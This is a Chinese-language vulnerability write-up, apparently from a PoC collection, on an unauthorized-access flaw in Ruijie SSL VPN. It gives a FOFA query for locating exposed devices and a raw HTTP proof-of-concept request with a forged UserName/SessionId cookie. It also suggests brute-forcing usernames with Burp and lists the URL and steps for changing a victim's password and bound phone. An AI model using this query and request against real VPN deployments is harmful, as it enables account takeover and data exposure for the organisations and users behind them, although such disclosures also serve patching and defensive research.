# 锐捷SSL VPN 越权访问漏洞

### 漏洞描述 <a href="#lou-dong-miao-shu" id="lou-dong-miao-shu"></a>

Ruijie SSL VPN 存在越权访问漏洞，攻击者在已知用户名的情况下，可以对账号进行修改密码和绑定手机的操作。并在未授权的情况下查看服务器资源

### 漏洞影响 <a href="#lou-dong-ying-xiang" id="lou-dong-ying-xiang"></a>

&#x20;Note

Ruijie SSL VPN

### FOFA <a href="#fofa" id="fofa"></a>

&#x20;Note

icon\_hash="884334722" || title="Ruijie SSL VPN"

### 漏洞复现 <a href="#lou-dong-fu-xian" id="lou-dong-fu-xian"></a>

访问目标 <http://xxx.xxx.xxx.xxx/cgi-bin/installjava.cgi>

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhr29TNgN3F9wtPQQQU%2F-MhrVRUdsBz6Ju_khOYE%2Fimage.png?alt=media\&token=dc9d9f46-27a7-40e9-97ec-30716dc5a680)

POC请求包如下

```
GET /cgi-bin/main.cgi?oper=getrsc HTTP/1.1
Host: xxx.xxx.xxx.xxx
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: UserName=xm; SessionId=1; FirstVist=1; Skin=1; tunnel=1
```

其中注意的参数为

```
Cookie: UserName=xm; SessionId=1; FirstVist=1; Skin=1; tunnel=1
```

UserName 参数为已知用户名

&#x20;Note

在未知登录用户名的情况下 漏洞无法利用(根据请求包使用Burp进行用户名爆破)

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhr29TNgN3F9wtPQQQU%2F-MhrVVa3zQbGozCJCJf7%2Fimage.png?alt=media\&token=862c79d8-81d9-4d7a-b7ca-961f72ec7166)

用户名正确时会返回敏感信息

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhr29TNgN3F9wtPQQQU%2F-MhrVYv4Nur5O8GAqjX2%2Fimage.png?alt=media\&token=7f657a6d-2ee9-4cd4-ae4d-58d754f8a32f)

通过此方法知道用户名后可以通过漏洞修改账号参数

访问 <http://xxx.xxx.xxx.xxx/cgi-bin/main.cgi?oper=showsvr&encode=GBK&username=liuw&sid=1&oper=showres>

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhr29TNgN3F9wtPQQQU%2F-MhrVfVizcMmwIQ-uYWi%2Fimage.png?alt=media\&token=bae1c1e3-72db-4a09-b1d2-9552dc002aa9)

点击个人设置跳转页面即可修改账号信息

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhr29TNgN3F9wtPQQQU%2F-MhrVjgkZD9nd1TPCJsi%2Fimage.png?alt=media\&token=0642a847-6bc3-406f-987f-505e6ced771a)

### 参考文章 <a href="#can-kao-wen-zhang" id="can-kao-wen-zhang"></a>

<https://mp.weixin.qq.com/s?__biz=MzU1NTkzMTYxOQ==&mid=2247484601&idx=1&sn=d6d6f4496243d98e688667faff137973>
